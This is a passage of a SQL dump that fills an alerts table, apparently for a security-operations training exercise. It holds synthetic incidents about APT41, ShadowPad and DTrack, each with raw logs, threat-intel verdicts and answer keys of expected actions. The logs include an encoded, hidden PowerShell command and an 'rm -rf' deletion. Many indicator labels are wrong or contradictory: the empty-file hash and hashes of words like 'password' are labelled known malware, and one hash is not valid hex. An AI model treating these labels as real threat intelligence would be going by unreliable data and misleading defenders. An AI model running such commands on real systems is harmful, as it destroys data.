actions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Empty file or common default hash, requires further investigation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (483, 'Backdoor Account Creation', 'high', 'User Account Activity Report', 'An attacker has created a new user account with administrative privileges on the CMS to maintain persistent access.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"user_account_creation\",\"user\":\"adminuser1\",\"created_by\":\"attacker_account\",\"created_at\":\"2023-10-05T14:20:00Z\",\"ip_address\":\"192.168.1.25\",\"external_ip\":\"203.0.113.5\",\"new_account\":{\"username\":\"backdooradmin\",\"privileges\":\"administrator\",\"creation_method\":\"web_interface\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"cms_user_mgmt.php\"}', '2026-01-05 03:22:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"backdooradmin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Newly created account with admin privileges.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"Common hash associated with empty files.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"cms_user_mgmt.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File related to user management in CMS.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (484, 'Social Media Amplification Detected', 'medium', 'Social Media Monitoring Tools', 'A bot network was detected disseminating fake articles across various social media platforms, amplifying false narratives.', 'Lateral Movement', 'T1090 - Connection Proxy', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_id\":\"SMAT-4567\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"social_bot_user\",\"filename\":\"amplification_script.py\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://examplemalicioussite.com/fake-news\",\"action\":\"post\",\"platform\":\"SocialMediaNet\",\"article_title\":\"Breaking News: Major Event Unfolds\",\"article_id\":\"art-7890\"}', '2026-01-05 03:22:52', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known botnet activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Recognized internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"social_bot_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual behavior detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"amplification_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Script used for spreading misinformation.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://examplemalicioussite.com/fake-news\",\"is_critical\":true,\"osint_result\":{\"source\":\"Web Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Site used for hosting fake news.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (485, 'Data Exfiltration Attempt Detected', 'high', 'Network Traffic Analysis', 'Finally, the attackers attempted to exfiltrate sensitive data from the CMS, aiming to use it for further operations or to sell on the dark web.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T19:45:00Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.55\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"sensitive_cms_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"alert_id\":\"EXFIL-2023-001\",\"malicious_url\":\"https://malicious.example.com/upload\",\"detected_by\":\"IDS\",\"description\":\"A data exfiltration attempt was detected by analyzing outgoing traffic from internal IP 192.168.1.105 to external IP 203.0.113.55 using HTTPS protocol.\"}', '2026-01-05 03:22:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal company network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"File hash matches known suspicious file signature.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_cms_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (486, 'Initial Access via Compromised Supplier Network', 'high', 'Third-party network traffic logs', 'APT41 successfully exploited vulnerabilities in the supplier\'s network to gain initial access to the video game developer\'s environment, leveraging compromised credentials and known malware.', 'Supply Chain Compromise', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:47:23Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"supplier_admin\",\"malware_filename\":\"ccleaner_setup.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"login_success\",\"protocol\":\"https\",\"url\":\"https://supplier-compromised.com/update\",\"message\":\"Successful login from external IP using compromised credentials. Known malicious file transferred.\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of video game developer\'s server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"supplier_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CCleaner Supply Chain attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (487, 'Execution of Malicious Code in Build Environment', 'critical', 'Build server activity logs', 'APT41 executed a code injection attack by embedding a ShadowPad backdoor into the game executable during the build process, leveraging access to the build environment.', 'Code Injection', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:35:12Z\",\"build_server\":\"build-server-01\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.50.24\",\"external_ip\":\"203.0.113.45\",\"malicious_file\":\"game_exec_v2.exe\",\"malicious_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"injected_payload\":\"ShadowPad.dll\",\"event_description\":\"Detected execution of a code injection attack involving the ShadowPad backdoor.\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the build server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Associated with previous APT41 attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with ShadowPad backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious payload used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (488, 'Establishing Persistence with ShadowPad', 'high', 'Endpoint detection and response (EDR) logs', 'APT41 has installed the ShadowPad backdoor on a compromised system running a vulnerable gaming application. This action establishes a covert channel for persistent access, typical of APT41\'s tactics in targeting the gaming industry.', 'Backdoor Installation', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.25\",\"user\":\"john.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -encodedcommand W3N0YXJ0IC1wYXJhbSB7ZXhwbG9pdC5leGUgfQ==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"ShadowPad.dll\",\"severity\":\"high\",\"description\":\"ShadowPad backdoor installation detected via PowerShell execution on host 10.1.1.25 by user john.doe.\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 external IP used in ShadowPad campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ShadowPad malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File linked to ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (489, 'Lateral Movement Across Player Networks', 'high', 'User authentication logs', 'APT41 has been detected using the ShadowPad backdoor to perform credential dumping for lateral movement across player networks.', 'Credential Dumping', 'T1003.006 - OS Credential Dumping: DCSync', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T13:45:00Z\",\"event_type\":\"authentication_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.101\",\"username\":\"gamer123\",\"auth_method\":\"NTLM\",\"hashed_password\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"shadowpad.dll\",\"process_id\":4567,\"event_description\":\"Credential dumping attempt detected from external IP using NTLM authentication method.\",\"related_hash\":\"f3c6c09f0c3e3c4b1ee2f6f9c5e8f9df\",\"related_ip\":\"10.0.0.15\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP within player network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"gamer123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential credential dumping tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"shadowpad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Filename linked with ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (490, 'Data Exfiltration and Command Execution', 'critical', 'Network traffic analysis', 'APT41 has successfully exfiltrated sensitive data from the network and executed remote commands using an established backdoor. This action aligns with their known TTPs, causing significant damage to the compromised systems.', 'Data Theft', 'T1041 - Exfiltration Over Command and Control Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":8080,\"dst_port\":443,\"protocol\":\"TCP\",\"username\":\"jdoe\",\"file_exfil\":{\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"command_executed\":\"rm -rf /sensitive_data/*\",\"malware_name\":\"Backdoor.APT41\",\"external_command_control\":\"203.0.113.45\"}', '2026-01-05 03:26:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file exfiltrated by attacker.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (491, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting a key personnel in a South Korean defense firm. The email contains a malicious attachment disguised as a procurement request.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.10.5.23\",\"destination_email\":\"j.smith@defensecorp.kr\",\"attachment_name\":\"Procurement_Request_2023.docx\",\"attachment_hash\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"subject\":\"Urgent: Procurement Request\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns targeting defense sectors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.smith@defensecorp.kr\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Email address of a key personnel at the targeted company.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Procurement_Request_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains active macro that downloads additional payloads.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (492, 'Execution of DTrack Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the malicious attachment, a macro executes, downloading the DTrack payload onto the victim\'s machine, marking the next phase of the attack.', 'Execution', 'T1204: User Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.15\",\"file_created\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\DTrackPayload.exe\",\"file_hash\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"process_name\":\"macro_loader.exe\",\"process_command_line\":\"macro_loader.exe -d C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious.docm\",\"process_id\":\"6789\",\"parent_process\":\"WINWORD.EXE\",\"parent_process_id\":\"1234\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DTrack malware sample\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"DTrackPayload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"suspicious\",\"details\":\"Unusual execution detected\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (493, 'Establishing Persistence with DLL Hijacking', 'high', 'System Logs', 'The attackers utilize DLL hijacking techniques to embed DTrack into legitimate processes, allowing them to maintain a foothold within the network.', 'Persistence', 'T1574.001 - DLL Search Order Hijacking', 1, 'new', NULL, '{\"event_id\":4624,\"timestamp\":\"2023-10-15T14:32:00Z\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.12\",\"process_name\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"injected_dll\":\"C:\\\\Windows\\\\System32\\\\hijacked.dll\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"event_description\":\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with DTrack malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"DLL used for persistence by malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (494, 'Lateral Movement Detected via Pass-the-Hash', 'high', 'Network Traffic Analysis', 'An attacker has been detected moving laterally across the network using Pass-the-Hash technique. The attacker used stolen credentials to access multiple internal systems, searching for sensitive schematics related to tank and laser weaponry.', 'Lateral Movement', 'T1075', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"network_connection\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"internal_user1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_accessed\":\"tank_schematics_v3.pdf\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"destination_ports\":[445,139],\"note\":\"Suspicious access pattern detected using Pass-the-Hash.\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal asset, department: R&D\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"internal_user1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Account used in abnormal access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Potential credential dump hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (495, 'Exfiltration of Sensitive Schematics', 'critical', 'Data Loss Prevention (DLP) Logs', 'The attackers have successfully exfiltrated sensitive defense schematics using encrypted channels. This marks the final stage of their espionage mission.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T03:45:27Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TLS\",\"file_sha256\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"sensitive_schematics_v5.pdf\",\"user\":\"jdoe_internal\",\"outbound_channel\":\"encrypted_tunnel\",\"actions_taken\":[\"file_transfer\"],\"status\":\"completed\"}', '2026-01-05 04:01:18', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration 